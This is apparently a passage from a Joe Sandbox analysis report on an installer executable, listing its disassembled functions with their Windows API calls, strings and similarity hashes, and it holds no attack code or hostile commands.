Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID:
String ID: p!C$p!C
API String ID: 0-3125587631
Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction ID: 15f69c865bc8d9ec0e9cf8060aa07673d574756af28658d99b75493111c5da86
Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
Instruction Fuzzy Hash: 1DC15831E042598BCF18CF68D4905EEB7B2FF99314F25826AD8567B380D7346A42CF95

Function 00406869 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14

Function 004042B1 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040434F
GetDlgItem.USER32(?,000003E8), ref: 00404363
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
GetSysColor.USER32(?), ref: 00404391
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040439F
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043AD
lstrlenW.KERNEL32(?), ref: 004043B2
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043BF
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D4
GetDlgItem.USER32(?,0000040A), ref: 0040442D
SendMessageW.USER32(00000000), ref: 00404434
GetDlgItem.USER32(?,000003E8), ref: 0040445F
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A2
LoadCursorW.USER32(00000000,00007F02), ref: 004044B0
SetCursor.USER32(00000000), ref: 004044B3
ShellExecuteW.SHELL32(0000070B,open,00432E80,00000000,00000000,00000001), ref: 004044C8
LoadCursorW.USER32(00000000,00007F00), ref: 004044D4
SetCursor.USER32(00000000), ref: 004044D7
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404506
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404518

Strings

N, xrefs: 0040444D
open, xrefs: 004044C0
(B@, xrefs: 004044BD
: Completed, xrefs: 0040448E

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: (B@$: Completed$N$open
API String ID: 3615053054-2720870854
Opcode ID: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
Instruction ID: 98cd9110a96fdc90c980e8b88af1c06473e6a142e5aecddf25117f52f4c400a7
Opcode Fuzzy Hash: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
Instruction Fuzzy Hash: 217181B1900209BFDB109F60DD89AAA7B79FB84745F00803AF745B62D1C778AD51CFA8

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,Windowlet Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

Windowlet Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Windowlet Setup
API String ID: 941294808-3494990132
Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4

Function 00405D7F Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(004308E8,NUL,?,00000000,?,?,00405F12,?,?), ref: 00405D8E
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F12,?,?), ref: 00405DB2
GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB

Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC

GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
wsprintfA.USER32 ref: 00405DF6
GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
GlobalFree.KERNEL32(00000000), ref: 00405EDF
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6

Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\4Vx2rUlb0f.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C29
Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00405C4B

Strings

%ls=%ls, xrefs: 00405DEC
NUL, xrefs: 00405D88
[Rename], xrefs: 00405E60, 00405E72

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
Opcode Fuzzy Hash: 30846692017808bfd9aa764f556a0762a2c37fabb6d3c616e21c38c05ea1324d
Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC

Function 004062E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
CharNextW.USER32(?,?,?,00000000), ref: 00406356
CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E

Strings

*?|<>/":, xrefs: 00406336
C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
"C:\Users\user\Desktop\4Vx2rUlb0f.exe", xrefs: 004062E4

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\4Vx2rUlb0f.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4284022603
Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD

Function 0040417B Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404198
GetSysColor.USER32(00000000), ref: 004041B4
SetTextColor.GDI32(?,00000000), ref: 004041C0
SetBkMode.GDI32(?,?), ref: 004041CC
GetSysColor.USER32(?), ref: 004041DF
SetBkColor.GDI32(?,?), ref: 004041EF
DeleteObject.GDI32(?), ref: 00404209
CreateBrushIndirect.GDI32(?), ref: 00404213

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D1C

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69

Function 00404A79 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
GetMessagePos.USER32 ref: 00404A9C
ScreenToClient.USER32(?,?), ref: 00404AB6
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE

Strings

f, xrefs: 00404ACA

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(000BE687,00000064,000BE68B), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
Instruction ID: 1aef917cd227803a683e0008524bb9a83fcfbb8b8ade77014dfab24c7f5e3f69
Opcode Fuzzy Hash: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
Instruction Fuzzy Hash: F121C172800128BBCF216FA5CE49D9E7E79EF09324F20023AF510762E1C7795D418FA8

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
